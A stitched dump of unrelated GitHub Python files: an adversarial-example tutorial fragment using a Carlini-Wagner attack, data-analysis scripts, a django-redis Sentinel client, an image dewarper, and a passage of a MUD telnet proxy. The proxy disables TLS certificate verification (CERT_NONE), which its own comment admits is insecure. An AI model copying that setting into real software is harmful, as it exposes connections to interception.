attack\nwith warnings.catch_warnings():\n cw_l2 = CarliniWagnerL2( wrapper, sess=session )\n modified_sample = cw_l2.generate_np( sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ),\n **{ 'eps': eps } )\n\nprint( 'class prediction for the cw modified test samples:',\n clf.predict( modified_sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ) ) )\nplt.imshow( modified_sample.reshape( 28, 28 ), cmap=\"gray_r\" )\nplt.axis( 'off' )\nplt.show( )\n\n","repo_name":"podschwadt/aml_tutorial","sub_path":"attacks_cnn.py","file_name":"attacks_cnn.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45262377098","text":"\"\"\"\r\nCreated on Mon Jun 20 13:30:21 2022\r\n\r\n@author: Agustina Ravettino\r\n\"\"\"\r\n\r\ndef pandas_function(results_file_name) :\r\n \"\"\"Loads a file into a pandas dataframe and calculates and prints out the\r\n 1. average file size\r\n 2. the biggest file\r\n 3. the smallest file\r\n 4. histogram plot of file sizes\r\n param results_file_name: str results file name.\r\n return: result: json with results. 
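For example (illustrative input), each line of the file holds a file name and a size in bytes, such as 'notes.txt 1024'. 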
\r\n \"\"\"\r\n import pandas as pd\r\n import json\r\n import numpy as np\r\n\r\n #Set dataframe columns\r\n colnames=['file_name','size_in_bytes']\r\n #Read file\r\n data=pd.read_csv(results_file_name,names=colnames, header=None,delim_whitespace=True)\r\n #Do calculations\r\n average= data.size_in_bytes.mean()\r\n #Generates mask for biggest and smallest files to allocate those file names\r\n mask_biggest= data.size_in_bytes ==data.size_in_bytes.max()\r\n biggest_ind=data[mask_biggest].index.values\r\n biggests=data.file_name[biggest_ind].values\r\n mask_smallest= data.size_in_bytes ==data.size_in_bytes.min()\r\n smallest_ind=data[mask_smallest].index.values\r\n smallests=data.file_name[smallest_ind].values\r\n #Generate a simple histogram plot\r\n ax = data.plot.hist(bins=10, alpha=0.8)\r\n\r\n #Print out results\r\n print( \"The average file size in bytes is: \", round(average,2), \r\n \"\\nThe biggest file/s is/are: \", biggests, \r\n \"\\nThe smallest file/s is/are: \", smallests\r\n ) \r\n biggests_str= np.array2string(biggests, precision=2, separator=',',\r\n suppress_small=True)\r\n smallests_str= np.array2string(smallests, precision=2, separator=',',\r\n suppress_small=True)\r\n result = {\r\n \"AverageFileSizeInBytes\": average,\r\n \"Biggest(s)File(s)\": biggests_str,\r\n \"Smallest(s)File(s)\": smallests_str\r\n }\r\n \r\n result = json.dumps(result)\r\n\r\n return result\r\n\r\n\r\ndef unzip_file(directory):\r\n \"\"\"function to unzip file\"\"\"\r\n from zipfile import ZipFile # needed for ZipFile below\r\n with ZipFile(directory, 'r') as zipObj:\r\n # Extract all the contents of zip file in current directory\r\n zipObj.extractall()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"agusrave/Coding-Challenge","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2305097352","text":"from ._dataset import *\nfrom ._types import *\n\nDATA_SETS = dict()\nfor spectrum in SpectrumType:\n DATA_SETS.update(\n {\n spectrum: Dataset.create(spectrum)\n }\n )\n\n\nclass Material(object):\n def __init__(self, plastic_type: Plastic):\n if not isinstance(plastic_type, Plastic):\n raise ValueError(f'Invalid type of plastic: {plastic_type} \\n '\n f'Supported plastic types: {[e.value for e in Plastic]}')\n self._plastic_type = plastic_type\n self._spectrum = dict()\n\n for spectrum_type in SpectrumType:\n self._spectrum.update(\n {\n spectrum_type: DATA_SETS[spectrum_type].get().loc[self._plastic_type.value].sample().iloc[0]\n }\n )\n\n def spectrum(self, spectrum_type: SpectrumType):\n return self._spectrum[spectrum_type]\n","repo_name":"mrrostam/rcplant","sub_path":"rcplant/_material.py","file_name":"_material.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29583701402","text":"from urllib.parse import urlparse, parse_qs, urlunparse, urlencode\n\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django_redis.client import DefaultClient\nfrom django_redis.pool import ConnectionFactory\nfrom redis.connection import to_bool\nfrom redis.sentinel import Sentinel, SentinelConnectionPool\n\n\nclass SentinelConnectionFactory(ConnectionFactory):\n def __init__(self, options):\n # allow overriding the default SentinelConnectionPool class\n options.setdefault(\"CONNECTION_POOL_CLASS\", \"redis.sentinel.SentinelConnectionPool\")\n super().__init__(options)\n\n sentinels = options.get(\"SENTINELS\")\n if 
not sentinels:\n raise ImproperlyConfigured(\"SENTINELS must be provided as a list of (host, port).\")\n\n # provide the connection pool kwargs to the sentinel in case it\n # needs to use the socket options for the sentinels themselves\n connection_kwargs = self.make_connection_params(None)\n connection_kwargs.pop(\"url\")\n connection_kwargs.update(self.pool_cls_kwargs)\n self._sentinel = Sentinel(\n sentinels,\n sentinel_kwargs=options.get(\"SENTINEL_KWARGS\"),\n **connection_kwargs,\n )\n\n def get_connection_pool(self, params):\n \"\"\"\n Given connection parameters, return a new sentinel connection pool\n for them.\n \"\"\"\n url = urlparse(params[\"url\"])\n\n # explicitly set service_name and sentinel_manager for the\n # SentinelConnectionPool constructor since it will be called by from_url\n cp_params = dict(params)\n cp_params.update(service_name=url.hostname, sentinel_manager=self._sentinel)\n pool = super().get_connection_pool(cp_params)\n\n # convert \"is_master\" to a boolean if set on the URL, otherwise if not\n # provided it defaults to True.\n is_master = parse_qs(url.query).get(\"is_master\")\n if is_master:\n pool.is_master = to_bool(is_master[0])\n\n return pool\n\n\ndef replace_query(url, query):\n return urlunparse((*url[:4], urlencode(query, doseq=True), url[5]))\n\n\nclass SentinelClient(DefaultClient):\n \"\"\"\n Sentinel client which uses the single redis URL specified by the CACHE's\n LOCATION to create a LOCATION configuration for two connection pools; One\n pool for the primaries and another pool for the replicas, and upon\n connecting ensures the connection pool factory is configured correctly.\n \"\"\"\n\n def __init__(self, server, params, backend):\n if isinstance(server, str):\n url = urlparse(server)\n primary_query = parse_qs(url.query, keep_blank_values=True)\n replica_query = dict(primary_query)\n primary_query[\"is_master\"] = [1]\n replica_query[\"is_master\"] = [0]\n\n server = [replace_query(url, i) for i in (primary_query, replica_query)]\n\n super().__init__(server, params, backend)\n\n def connect(self, *args, **kwargs):\n connection = super().connect(*args, **kwargs)\n if not isinstance(connection.connection_pool, SentinelConnectionPool):\n raise ImproperlyConfigured(\n \"Settings DJANGO_REDIS_CONNECTION_FACTORY or \"\n \"CACHE[].OPTIONS.CONNECTION_POOL_CLASS is not configured correctly.\"\n )\n\n return connection\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/utils/sentinel.py","file_name":"sentinel.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"15150802309","text":"# datasets options\r\n'''\r\n features --> Time, HomeTeam, AwayTeam, Referee, Home Team Shots on Target,\r\n Away Team Shots on Target, Kick efficiency(last season) --> Mean shots on target/Mean gols\r\n \r\n 1 option --> Predict the total gols (Regression)\r\n \r\n 2 option --> Predict if total gols +- 2.5 (Classifier)\r\n \r\n -- Concatenate 2 years of the championship\r\n -- Focus on 1.5 classifier \r\n -- Create a new feature \r\n \r\n \r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom analyse_the_goals import df_gols, df_features, df_home_features, df_away_features\r\n# , df_gols_2, df_features_2,df_home_features_2, df_away_features_2\r\n\r\ndef data_1_option(data):\r\n return data[['DTO','Time','HomeTeam','AwayTeam','Referee','TG']]\r\n\r\ndef data_2_option(data, data_home_features, 
data_away_features):\r\n \r\n home_teams = data['HomeTeam'].values\r\n away_teams = data['AwayTeam'].values\r\n \r\n _kick_eff_home, _kick_eff_home_opp = [], []\r\n _kick_eff_away, _kick_eff_away_opp = [], []\r\n \r\n for team in home_teams: \r\n kick_eff = data_home_features[(data_home_features['team'] == team)]['Kick_eff'].values[0]\r\n kick_eff_opp = data_home_features[(data_home_features['team'] == team)]['Kick_eff_opp'].values[0]\r\n \r\n _kick_eff_home.append(kick_eff), _kick_eff_home_opp.append(kick_eff_opp)\r\n \r\n for team in away_teams:\r\n kick_eff = data_away_features[(data_away_features['team'] == team)]['Kick_eff'].values[0]\r\n kick_eff_opp = data_away_features[(data_away_features['team'] == team)]['Kick_eff_opp'].values[0]\r\n \r\n _kick_eff_away.append(kick_eff), _kick_eff_away_opp.append(kick_eff_opp)\r\n\r\n data['HKE'] = _kick_eff_home\r\n data['HKEP'] = _kick_eff_home_opp\r\n data['AHE'] = _kick_eff_away\r\n data['AKEP'] = _kick_eff_away_opp\r\n\r\n def classifier_gols(value):\r\n if value < 2.5:\r\n return 0.0\r\n else:\r\n return 1.0\r\n \r\n data['TG'] = data['TG'].apply(lambda value: classifier_gols(value))\r\n \r\n return data[['Time','HomeTeam','AwayTeam','Referee','HKE','HKEP','AHE','AKEP','TG']]\r\n\r\ndef concatenated_datas(data_1,data_2):\r\n return pd.concat([data_1,data_2])\r\n\r\n\r\n# df_1 = data_1_option(df_nf_c)\r\ndf_2 = data_2_option(df_features, df_home_features, df_away_features)\r\n# df_2_2 = data_2_option(df_features_2, df_home_features_2, df_away_features_2)\r\n\r\n# data_plus = concatenated_datas(df_2,df_2_2)","repo_name":"lgomesgl/Predict_gols","sub_path":"datasets_the_goals.py","file_name":"datasets_the_goals.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6243375648","text":"import cv2, thread, time, urllib\nimport numpy as np\nfrom PIL import Image\n\n# Frame size\nWs = 320\nHs = 240\n# Center of the donut\nCx = 157\nCy = 125\n# Inner donut radius\nR1 = 60\n# Outer donut radius\nR2 = 130\n\nuscita=False\n\n# Build the unwarp mapping\ndef buildMap(Ws,Hs,Wd,Hd,R1,R2,Cx,Cy):\n map_x = np.zeros((Hd,Wd),np.float32)\n map_y = np.zeros((Hd,Wd),np.float32)\n p2=2.0*np.pi\n pm=np.pi/2.0\n Rx=R2-R1\n for y in range(0,int(Hd-1)):\n for x in range(0,int(Wd-1)):\n r = (float(y)/float(Hd))*Rx+R1\n theta = (float(x)/float(Wd))*p2-pm\n xS = Cx+r*np.sin(theta)\n yS = Cy+r*np.cos(theta)\n map_x.itemset((y,x),int(xS))\n map_y.itemset((y,x),int(yS))\n return map_x, map_y\n\n# Do the unwarping \ndef unwarping(img,xmap,ymap):\n output = cv2.remap(img,xmap,ymap,cv2.INTER_LINEAR)\n return output\n \n# Get next video frame (cv2 format)\n# Uses mjpg-streamer to create the video stream\ndef GetFrame():\n req = urllib.urlopen('http://127.0.0.1:8080/?action=snapshot')\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n image = cv2.imdecode(arr,-1)\n return image\n\n# Output image size\nWd = 2.0*((R2+R1)/2)*np.pi\nHd = (R2-R1)\n# Build unwarping map\nxmap,ymap = buildMap(Ws,Hs,Wd,Hd,R1,R2,Cx,Cy)\n# First unwarp\nimg = GetFrame()\npanorama = unwarping(img,xmap,ymap)\n\ndef UnWarp():\n global xmap\n global ymap\n global panorama\n global uscita\n while True:\n img = GetFrame()\n panorama = unwarping(img,xmap,ymap)\n if (uscita):\n thread.exit()\n\ndef ExitUnwarp():\n 
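# Signals the UnWarp() loop, which checks this flag and calls thread.exit() on its next pass.\n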
global uscita\n uscita=True\n","repo_name":"mascalx/PiSpider","sub_path":"script/dewarp.py","file_name":"dewarp.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8911150826","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('add_review/', views.add_review, name='add_review'),\n path('edit_review//', views.edit_review,\n name='edit_review'),\n path('delete_review_confirmation//',\n views.delete_review_confirmation,\n name='delete_review_confirmation'),\n path('delete_review//', views.delete_review,\n name='delete_review'),\n path('add_review_success/', views.add_review_success,\n name='add_review_success'),\n]\n","repo_name":"ACEGAZ/game-hunter","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24867894686","text":"import argparse\nimport json\nimport logging\nimport os\nimport xml.etree.ElementTree as etree\n\n\nparser = argparse.ArgumentParser(description=\"Read cfdis and show the resume\")\nparser.add_argument(\"-d\", \"--directory\", type=str, help=\"directory\")\n\nns = {\n \"cfdi\": \"http://www.sat.gob.mx/cfd/3\",\n \"nomina12\": \"http://www.sat.gob.mx/nomina12\",\n}\n\n\ndef main(dir_path):\n logging.info(f\"Read CFDI from {dir_path}\")\n emisor_dict = {}\n for month in range(1, 13):\n month_dir = f\"{dir_path}/{month:02d}/\"\n logging.info(month_dir)\n\n for file in os.listdir(month_dir):\n\n if file.endswith(\".xml\"):\n tree = etree.parse(f\"{month_dir}{file}\")\n root = tree.getroot()\n total = float(root.attrib.get(\"Total\"))\n emisor = root.find(\"cfdi:Emisor\", ns)\n emisor_name = emisor.attrib.get(\"Nombre\")\n emisor_rfc = emisor.attrib.get(\"Rfc\")\n total_cumulative = emisor_dict.get(emisor_rfc, {}).get(\n \"total\", 0\n )\n month_cumulative = emisor_dict.get(emisor_rfc, {}).get(\n f\"{month:02d}\", 0\n )\n if not emisor_dict.get(emisor_rfc):\n emisor_dict[emisor_rfc] = {}\n\n emisor_dict[emisor_rfc].update(\n {\n \"nombre\": emisor_name,\n \"total\": total + total_cumulative,\n f\"{month:02d}\": total + month_cumulative,\n }\n )\n print(json.dumps(emisor_dict, indent=4))\n\n\nif __name__ == \"__main__\":\n FORMAT = \"[%(asctime)s] [%(levelname)s] %(message)s\"\n logging.basicConfig(level=logging.INFO, format=FORMAT)\n args = parser.parse_args()\n main(args.directory)\n","repo_name":"pecalleja/sat-review","sub_path":"year_resume.py","file_name":"year_resume.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32423305753","text":"# vim: tabstop=3:shiftwidth=3:expandtab:autoindent\n\n# 'Telnet' multiplexer for MUDs, etc. 
Python 3.\n\n# Things we should be doing someday:\n# - actually understand the underlying protocols (Telnet) instead of just stripping\n# them out\n\nimport sys\nimport threading\nimport logging\nimport traceback\n\nimport socket\nimport ssl\nimport selectors\n\nimport json\n\nimport os\nimport hashlib\nimport getpass\nimport base64\n\nimport pkgutil\nimport importlib\n\nimport ansi\n\n\nCONFIG_FILE = 'config.json'\nPASSWORD_FILE = 'password.json' # Password hash is stored here\n\n\nENCODING = 'utf-8' # (default)\nLINE_SEPARATOR = 10 # (default) ASCII/UTF-8 newline\n\nCOMMAND_PREFIX = ','\nMESSAGE_PREFIX_OK = '%% '\nMESSAGE_PREFIX_ERR = '!! '\n\nRECV_MAX = 4096 # bytes\n\n# (defaults; change in config.json)\nBIND_TO_HOST = \"localhost\"\nBIND_TO_PORT = 1234\n\n# We want cfg to be global, but not to load it on module import.\ncfg = None\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\n###\n### UTILITY FUNCTIONS\n###\n\n\ndef load_json(filename):\n try:\n with open(filename, 'r') as f:\n cfg = json.load(f)\n return cfg\n\n except FileNotFoundError:\n logging.info(\"Could not read JSON file {}\".format(filename))\n return None # ... we could just ignore it and let caller handle the\n # exception, but in this case since we're trying to *get\n # a value* it seems more appropriate to return no value\n # if there's nothing to get.\n\n\ndef save_json(data, filename):\n try:\n with open(filename, 'w') as f:\n json.dump(data, f, indent=3)\n\n except Exception as e:\n logging.error(\"Could not write JSON to file {}\".format(filename))\n raise e\n\n\n###\n### PASSWORD\n###\n\n# We want to make sure random people can't sneak in and access the proxy, even\n# if it's on a local-area network. We use a single password for this.\n\n# After reading some things, I chose to use...scrypt. I am not a cryptographer,\n# but it looked reasonable, it was in the Python standard library, and it seemed\n# possible it was more secure than sha256. It's unlikely this particular application\n# will be attacked by a serious password-cracker anyway, but you never really\n# know...\n\nclass Password:\n \"\"\"Stores a hashed user password using scrypt.\n\n When it is initialized, it will try to load the hash from a file; if it can't manage\n to do that, it will block on initialization to prompt the user for a new password\n (and try to persist that to the file.)\"\"\"\n def __init__(self):\n self.hashed = load_json(PASSWORD_FILE)\n if self.hashed is None:\n self.prompt_user_for_new_password()\n print(repr(self.hashed))\n save_json({k: base64.b64encode(v).decode('ascii') for k, v in self.hashed.items()}, PASSWORD_FILE)\n else:\n self.hashed = {k: base64.b64decode(v) for k, v in self.hashed.items()}\n\n def hash(self, password, salt):\n \"\"\"This function should return a bytes-like object containing the hash of 'password'\n given the salt 'salt'. 
The password argument should be a string.\"\"\"\n hashtype = cfg.get('password_hash_method', 'scrypt')\n\n if hashtype == 'scrypt':\n # https://blog.filippo.io/the-scrypt-parameters/ was used for a reference for\n # what these mean and what to set them to.\n return hashlib.scrypt(password.encode('utf8'), salt=salt, n=2 ** 15, r=8, p=1, maxmem=1024 * 1024 * 64)\n elif hashtype == 'pbkdf2':\n return hashlib.pbkdf2_hmac('sha256', password.encode('utf8'), salt, 1000000)\n else:\n raise ValueError(\"Invalid password-hashing method '{}'\".format(hashtype))\n\n def prompt_user_for_new_password(self):\n \"\"\"Prompt the user for a new password on the console and setup self to verify it later.\"\"\"\n salt = os.urandom(16)\n\n pw = None\n while pw is None:\n pw_one = getpass.getpass(prompt='No password to access the proxy has been set.\\nEnter one now: ')\n pw_two = getpass.getpass(prompt='Confirm password: ')\n\n if pw_two == pw_one:\n pw = pw_one\n\n self.hashed = {'salt': salt, 'hash': self.hash(pw, salt)}\n\n def verify(self, candidate_password):\n \"\"\"Check `candidate_password' (a string) against self; return whether it's right.\"\"\"\n if self.hashed is None:\n raise ValueError(\"Tried to check a password that doesn't exist.\")\n\n candidate = self.hash(candidate_password, self.hashed['salt'])\n if candidate == self.hashed['hash']:\n return True\n else:\n return False\n\n\n###\n### NETWORKING\n###\n\n\nclass TextLine:\n \"\"\"An abstract container for lines of text. This seemed like an important\n design element at one point, but it may not be nearly as important now.\"\"\"\n def __init__(self, string, encoding):\n assert type(string) == bytes or type(string) == str\n self.__enc = encoding\n\n self.set(string)\n\n def set(self, string):\n \"\"\"(Temporary method for testing.)\"\"\"\n if type(string) == bytes:\n self.__raw = string\n else:\n self.__raw = string.encode(self.__enc)\n\n def as_str(self):\n \"\"\"Try to 'safely', but lossily, decode the raw line into an ordinary string,\n according to the encoding given.\"\"\"\n s = \"\"\n r = self.__raw\n\n while len(r) > 0:\n try:\n s += r.decode(self.__enc)\n r = ''\n except UnicodeDecodeError as e:\n s += r[:e.start].decode(self.__enc)\n\n for byte in r[e.start:e.end]:\n s += '?(' + str(byte) + ')'\n\n r = r[e.end:]\n\n return s\n\n def as_bytes(self):\n return self.__raw\n\n\nclass LineBufferingSocketContainer:\n \"\"\"A base class that helps handle reading from and writing to a socket. The\n I/O is buffered to lines, and telnet control codes (i.e. IAC ...) are dropped.\n (Thus this class only works with servers that are willing to play dumb. 
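(That is, servers that tolerate a client which silently drops Telnet option negotiation instead of answering it.) 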
But\n that's most servers, luckily for us.)\"\"\"\n def __init__(self, socket = None):\n self.__b_send_buffer = b''\n self.__b_recv_buffer = b''\n\n self.connected = False\n\n self.socket = None\n\n self.encoding = ENCODING\n self.linesep = LINE_SEPARATOR\n\n if socket != None:\n self.attach_socket(socket)\n\n def write_str(self, data):\n \"\"\"Write a string to the underlying socket.\"\"\"\n assert type(data) == str\n\n self.__b_send_buffer += data.encode(self.encoding)\n\n self.flush()\n\n def write_line(self, line):\n \"\"\"Write a TextLine to the underlying socket.\"\"\"\n assert type(line) == TextLine\n\n self.__b_send_buffer += line.as_bytes()\n\n self.flush()\n\n def write(self, data):\n \"\"\"Write some bytes to the underlying socket.\"\"\"\n assert type(data) == bytes\n\n self.__b_send_buffer += data\n\n self.flush()\n\n def flush(self):\n \"\"\"Send as much buffered input as the socket will allow, but only attempt to\n do so up to the end of the last complete line.\"\"\"\n assert self.socket != None\n assert self.connected\n\n while len(self.__b_send_buffer) > 0 and self.linesep in self.__b_send_buffer:\n try:\n t = self.__b_send_buffer.index(self.linesep)\n n_bytes = self.socket.send(self.__b_send_buffer[:t+1])\n self.__b_send_buffer = self.__b_send_buffer[n_bytes:]\n\n except (BlockingIOError, ssl.SSLWantReadError, ssl.SSLWantWriteError):\n logging.info(\"Note: BlockingIOError in flush() call\")\n break\n\n except OSError:\n logging.error(\"Got an OSError in flush() call\")\n break\n\n def read(self):\n \"\"\"Read as much data as the socket will provide. Returns a pair like `([list of TextLine's or empty],\n found_eof?)'. If found_eof? is true, the connection has probably died.\"\"\"\n assert self.connected\n assert self.socket != None\n\n has_eof = False\n\n try:\n data = b''\n while True:\n data = self.socket.recv(RECV_MAX)\n self.__b_recv_buffer += data\n if len(data) < RECV_MAX:\n # If the length of data returned by a read() call is 0, that actually means the\n # remote side closed the connection. If there's actually no data to be read,\n # you get a BlockingIOError or one of its SSL-based cousins instead.\n if len(data) == 0:\n has_eof = True\n break\n data = b''\n\n except (BlockingIOError, ssl.SSLWantReadError, ssl.SSLWantWriteError):\n pass\n\n except OSError:\n logging.error(\"Got an OSError in read() call\")\n\n except ConnectionResetError:\n has_eof = True\n\n q = []\n\n # Telnet codes are a problem. TODO: Improve this super hacky solution, which just involves\n # ... completely removing them from the input stream (except for IAC IAC / 255 255.)\n\n stripped = b''\n\n IAC = 255\n DONT = 254\n DO = 253\n WONT = 252\n WILL = 251\n\n in_command = False\n\n # Speaking of awful hacks, this is probably not very efficient at all:\n\n x = 0\n while x < len(self.__b_recv_buffer):\n if in_command:\n if self.__b_recv_buffer[x] == IAC:\n stripped += bytes([IAC])\n in_command = False\n elif self.__b_recv_buffer[x] <= DONT and self.__b_recv_buffer[x] >= WILL:\n pass\n else:\n # TODO: Figure out if there are Telnet codes that will be baffled by this\n # (are they all guaranteed to be 2 bytes long except for IAC XYZ?)\n in_command = False\n else:\n if self.__b_recv_buffer[x] == IAC:\n in_command = True\n else:\n stripped += self.__b_recv_buffer[x:x+1]\n x += 1\n\n # The best we can do for a record separator in this case is a byte or byte sequence that\n # means 'newline'. 
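(With LINE_SEPARATOR = 10 that is the ASCII/UTF-8 line feed, 0x0A.) 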
We go with one byte for now for simplicity & because it works with\n # UTF-8/ASCII at least, which comprises most things we're interested in.\n\n while self.linesep in stripped:\n t = stripped.index(self.linesep)\n q += [TextLine(stripped[:t+1], self.encoding)]\n stripped = stripped[t+1:]\n\n self.__b_recv_buffer = stripped\n\n # Make sure it starts in in_command mode again next time around in case the read() call\n # left us in the middle of a command, which I don't think is *likely* but could happen.\n # (The rest of the command will get tacked on after the IAC, which will ensure\n # the thing goes back into command mode immediately prior.)\n\n if in_command:\n self.__b_recv_buffer += bytes([IAC])\n\n return (q, has_eof)\n\n def attach_socket(self, socket):\n \"\"\"Set up `self' to work with `socket'.\"\"\"\n socket.setblocking(False)\n self.socket = socket\n self.connected = True\n\n def handle_disconnect(self):\n \"\"\"Call this function when the remote end closed the connection to nullify and\n make false the appropriate variables.\"\"\"\n self.socket = None\n self.connected = False\n\n\nclass FilterSpecificationError(Exception):\n \"\"\"This Exception subclass is thrown when the user has made an error specifying a\n filter or parameters for setting up said filter.\"\"\"\n pass\n\n\nclass FilteredSocket(LineBufferingSocketContainer):\n \"\"\"This class mostly extends LineBufferingSocketContainer with a list of filters and\n logic for setting it up from a specification.\"\"\"\n # Doesn't actually filter *itself* (yet?)\n # Would probably need to override some methods of the parent class.\n # (It may be impracticable to self-filter here anyway because the filters need to\n # know whether their text came from a server or a client and this class is too\n # abstract to know that. But this seemed like the best way to avoid code duplication.)\n def __init__(self):\n super().__init__()\n self.filters = []\n\n def add_filters(self, filters, prototypes):\n \"\"\"Add filters to self according to the specification in `filters` (same format as\n configuration file), drawing from the filter prototypes/classes in the dictionary\n `prototypes`. Can raise FilterSpecificationError.\"\"\"\n\n if type(filters) != list:\n raise FilterSpecificationError(\"Filters must be specified as list of [name,opts] pairs\")\n\n for f in filters:\n if type(f) != list or len(f) != 2 or type(f[0]) != str or type(f[1]) != dict:\n raise FilterSpecificationError(\"Format to specify a filter is ['filtername',{'option':'val',...}]\")\n\n filter_name = f[0]\n filter_opts = f[1]\n\n if filter_name not in prototypes:\n raise FilterSpecificationError(\"No such filter `{}'\".format(filter_name))\n return\n\n filter_class = prototypes[filter_name]\n\n self.filters.append(filter_class(self, filter_opts))\n\n\nclass RemoteServer(FilteredSocket):\n \"\"\"Handles a connection to a remote server, something multiple clients can connect to.\"\"\"\n def __init__(self, host, port, name=\"\"):\n super().__init__()\n\n assert type(host) is str\n assert type(name) is str\n assert type(port) is int\n\n self.host = host\n self.port = port\n self.name = name\n\n self.subscribers = []\n\n self.connecting_in_thread = False\n self.use_SSL = False\n\n def handle_data(self, data):\n \"\"\"Called when some data has arrived and needs to be dispatched to the subscribers.\"\"\"\n for sub in self.subscribers:\n sub.write_line(data)\n\n def attach_socket(self, socket):\n \"\"\"Set up to use socket `socket'. 
Overridden to notify any filters when a server is connected.\"\"\"\n super().attach_socket(socket)\n\n for f in self.filters:\n try:\n f.server_connect(True)\n except AttributeError:\n pass\n\n def handle_disconnect(self):\n \"\"\"Called when the connection has been lost.\"\"\"\n super().handle_disconnect()\n for sub in self.subscribers:\n sub.tell_err(\"Remote server closed connection.\")\n\n for f in self.filters:\n try:\n f.server_connect(False)\n except AttributeError:\n pass\n\n def subscribe(self, supplicant):\n \"\"\"Add `supplicant' to the list of subscribed clients.\"\"\"\n assert type(supplicant) == LocalClient\n if supplicant not in self.subscribers:\n self.subscribers.append(supplicant)\n\n def unsubscribe(self, supplicant):\n \"\"\"Remove `supplicant' from the list of subscribed clients.\"\"\"\n assert type(supplicant) == LocalClient\n while supplicant in self.subscribers:\n self.subscribers.remove(supplicant)\n\n def tell_all(self, msg):\n \"\"\"Tell all the clients subscribed to this particular server of something.\"\"\"\n assert type(msg) == str\n for sub in self.subscribers:\n sub.tell_ok(msg)\n\n def warn_all(self, msg):\n \"\"\"Warn all the clients subscribed to this particular server about something.\"\"\"\n assert type(msg) == str\n for sub in self.subscribers:\n sub.tell_err(msg)\n\n\nclass LocalClient(FilteredSocket):\n def __init__(self, socket):\n super().__init__()\n\n self.attach_socket(socket)\n self.subscribedTo = None\n\n def tell_ok(self, msg):\n self.write_str(MESSAGE_PREFIX_OK + msg + \"\\r\\n\")\n\n def tell_err(self, msg):\n self.write_str(MESSAGE_PREFIX_ERR + msg + \"\\r\\n\")\n\n def unsubscribe(self):\n if type(self.subscribedTo) == RemoteServer:\n self.subscribedTo.unsubscribe(self)\n self.subscribedTo = None\n else:\n raise ValueError(\"client.unsubscribe when subscribedTo not a RemoteServer\")\n\n def subscribe(self, other):\n assert type(other) == RemoteServer\n self.subscribedTo = other\n\n def handle_data(self, data):\n if self.subscribedTo == None:\n self.tell_err(\"Not subscribedTo anything.\")\n return\n\n if self.subscribedTo.connected:\n self.subscribedTo.write_line(data)\n else:\n self.tell_err(\"Remote server not connected.\")\n\n def attach_socket(self, socket):\n # Overridden to notify things when a client is connected.\n super().attach_socket(socket)\n\n for f in self.filters:\n try:\n f.client_connect(True)\n except AttributeError:\n pass\n\n def handle_disconnect(self):\n super().handle_disconnect()\n\n if self.subscribedTo != None:\n self.subscribedTo.unsubscribe(self)\n\n for f in self.filters:\n try:\n f.client_connect(False)\n except AttributeError:\n pass\n\n\n###\n### PROXY\n###\n\n\nclass Proxy:\n def __init__(self, cfg):\n self.LOCK = threading.Lock()\n self.sel = selectors.DefaultSelector()\n self.socket_wrappers = {}\n\n self.tls_ctx_remote = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)\n self.tls_ctx_local = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)\n self.tls_ctx_remote.check_hostname = False\n # This is insecure and bad. IDEALLY everything would serve a correctly set up\n # certificate and it would Just Work. 
But ...\n self.tls_ctx_remote.verify_mode = ssl.CERT_NONE\n self.tls_ctx_local.load_cert_chain(\"ssl/cert.pem\")\n\n self.servers = {} # index of available servers by display name\n self.server_sockets = []\n\n self.client_sockets = []\n self.client_commands = {}\n\n self.unauthenticated_sockets = []\n self.password = Password()\n\n self.states = [(self.server_sockets, self.handle_line_server),\n (self.unauthenticated_sockets, self.handle_line_auth),\n (self.client_sockets, self.handle_line_client)]\n\n if cfg.get('debug', False):\n self.register_command(\"e\", self.do_client_debug)\n self.register_command(\"eval\", self.do_client_debug)\n self.register_command(\"debug\", self.do_client_debug)\n self.register_command(\"J\", self.do_client_connect)\n self.register_command(\"connect\", self.do_client_connect)\n self.register_command(\"j\", self.do_client_join)\n self.register_command(\"join\", self.do_client_join)\n self.register_command(\"drop\", self.do_client_drop)\n self.register_command(\"d\", self.do_client_drop)\n self.register_command(\"hush\", self.do_client_drop)\n self.register_command(\"h\", self.do_client_help)\n self.register_command(\"help\", self.do_client_help)\n self.register_command(\"die\", self.do_client_stop_everything)\n self.register_command(\"D\", self.do_client_stop_everything)\n\n self.cfg = cfg\n\n self.filter_prototypes = {}\n\n def register_command(self, cmdname, cmd):\n #assert type(cmd) == function\n if cmdname not in self.client_commands:\n self.client_commands[cmdname] = cmd\n else:\n logging.warning(\"Note: Attempt to overwrite command `{}' failed\".format(cmdname))\n\n def register_filter(self, name, impl):\n #assert exists impl.from_client, \"Error: `{}' filter implementation needs 